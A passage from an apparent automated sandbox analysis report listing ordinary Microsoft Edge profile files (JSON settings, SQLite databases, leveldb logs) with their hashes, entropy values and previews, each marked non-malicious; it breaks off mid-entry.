                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):524656
                                                                                                                                                      Entropy (8bit):5.027445846313988E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Lsulb70lt:LsEglt
                                                                                                                                                      MD5:09485A64F44A0B66B170BC20D4204B6B
                                                                                                                                                      SHA1:DEA8C627B6C73C91D9A47AA302A6B12FC4608937
                                                                                                                                                      SHA-256:B88599B96F2298820ED1519A6602513A2753B4841D7658B575629F9C6E195CE1
                                                                                                                                                      SHA-512:D263D0A0B96CE3252FE966872714E927154CF20320C05B8FA505163613065D39E0681E15490FA894F3F00E88ABF8CF85FD890818A617CBCE612F606F420FAEC5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..........................................k.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):270336
                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):262512
                                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:LsNl6ip1:Ls3r1
                                                                                                                                                      MD5:1DF7EA85A3C2C3D49FBB181D27365EFC
                                                                                                                                                      SHA1:F0138667C70BC1E4FB164007E6D33B8736845972
                                                                                                                                                      SHA-256:FD260F08C2D5B14C68030E75D4F9F4A64724C9CC66C33E5DBD0F17CC7DA329EC
                                                                                                                                                      SHA-512:C48DDEE3FEABB1BB84A3D1CA6A7CB75F9964C979976CD9EC1CCE20A43665CF32B8F7FD7767942AA2911874653DF1741AD4506165C8EEEF9CD004C1C9B1BC10D4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.........................................m..../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):270336
                                                                                                                                                      Entropy (8bit):0.0012471779557650352
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                      MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                      SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                      SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                      SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):432
                                                                                                                                                      Entropy (8bit):5.263430520702495
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:24OvYfYebvqBQFUt8J9/+JI5JfYebvqBvJ:24MYfYebvZg8JcSJfYebvk
                                                                                                                                                      MD5:A71F4F07D7584DC86D68A1BEA6925570
                                                                                                                                                      SHA1:C276409E95A7B39C9943A8C9B76E1D71C0CC1B27
                                                                                                                                                      SHA-256:7DCC47ECE9101ECBDB0CCA0B397BC453A028E643A03A463E083517A6E2DDF2D5
                                                                                                                                                      SHA-512:73AD6FC07C31C3B44AD4D74B2A251FB5C162B248A711BF2FCEBF632827E86FDE8AF818D7971DA86B51C1DDECAB3C095B56E75079093634303738EB28D90D2441
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.771 1434 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/04-07:58:12.772 1434 Recovering log #3.2024/12/04-07:58:12.775 1434 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):432
                                                                                                                                                      Entropy (8bit):5.263430520702495
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:24OvYfYebvqBQFUt8J9/+JI5JfYebvqBvJ:24MYfYebvZg8JcSJfYebvk
                                                                                                                                                      MD5:A71F4F07D7584DC86D68A1BEA6925570
                                                                                                                                                      SHA1:C276409E95A7B39C9943A8C9B76E1D71C0CC1B27
                                                                                                                                                      SHA-256:7DCC47ECE9101ECBDB0CCA0B397BC453A028E643A03A463E083517A6E2DDF2D5
                                                                                                                                                      SHA-512:73AD6FC07C31C3B44AD4D74B2A251FB5C162B248A711BF2FCEBF632827E86FDE8AF818D7971DA86B51C1DDECAB3C095B56E75079093634303738EB28D90D2441
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:12.771 1434 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/04-07:58:12.772 1434 Recovering log #3.2024/12/04-07:58:12.775 1434 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):111
                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                      MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                      SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                      SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                      SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40
                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):193
                                                                                                                                                      Entropy (8bit):4.864047146590611
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                      MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                      SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                      SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                      SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):193
                                                                                                                                                      Entropy (8bit):4.864047146590611
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                      MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                      SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                      SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                      SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):36864
                                                                                                                                                      Entropy (8bit):0.555790634850688
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                      MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                      SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                      SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                      SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):40
                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):36864
                                                                                                                                                      Entropy (8bit):0.36515621748816035
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                      MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                      SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                      SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                      SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2
                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:[]
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):80
                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):420
                                                                                                                                                      Entropy (8bit):5.2736546562390325
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjoVq2Pwkn23oH+TcwtzjqEKj0QMxIFUt8mjc/SgZmw+mj7Xw0IkwOwkn23oH+Tj:ovYfYebvqBZFUt8lX/++I5JfYebvqBaJ
                                                                                                                                                      MD5:C481DCEBA2DBD96EF107AC83F570D865
                                                                                                                                                      SHA1:FAA78E43BC369D53597940A2CFB6DB27708B439E
                                                                                                                                                      SHA-256:381B3ACF36D597DC84FF5A04EEFADEF81C7959E5038A6F6C55EAB8CAF9CF9E98
                                                                                                                                                      SHA-512:AFBFA6CE6CE5B19264F1232EDB646EF2968495CC13B00AFDCE686077053B1D670F95C0EF9E483787CB5B6A6A37F88F31257B75B523DECA7A8052F70661FC58BE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:31.198 1dc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/04-07:58:31.199 1dc4 Recovering log #3.2024/12/04-07:58:31.203 1dc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):420
                                                                                                                                                      Entropy (8bit):5.2736546562390325
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjoVq2Pwkn23oH+TcwtzjqEKj0QMxIFUt8mjc/SgZmw+mj7Xw0IkwOwkn23oH+Tj:ovYfYebvqBZFUt8lX/++I5JfYebvqBaJ
                                                                                                                                                      MD5:C481DCEBA2DBD96EF107AC83F570D865
                                                                                                                                                      SHA1:FAA78E43BC369D53597940A2CFB6DB27708B439E
                                                                                                                                                      SHA-256:381B3ACF36D597DC84FF5A04EEFADEF81C7959E5038A6F6C55EAB8CAF9CF9E98
                                                                                                                                                      SHA-512:AFBFA6CE6CE5B19264F1232EDB646EF2968495CC13B00AFDCE686077053B1D670F95C0EF9E483787CB5B6A6A37F88F31257B75B523DECA7A8052F70661FC58BE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:2024/12/04-07:58:31.198 1dc4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/04-07:58:31.199 1dc4 Recovering log #3.2024/12/04-07:58:31.203 1dc4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):326
                                                                                                                                                      Entropy (8bit):5.246007075196928
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:jjznQyq2Pwkn23oH+TcwtpIFUt8mjzjVG1Zmw+mjzjVQRkwOwkn23oH+Tcwta/Wd:jVvYfYebmFUt8AVG1/+AVI5JfYebaUJ
                                                                                                                                                      MD5:444EDBADD27ED1F48CD5B798E390F9CF
                                                                                                                                                      SHA1:E8087D1D8CC22F5D24AD9B1FDAD4F185B9B80534
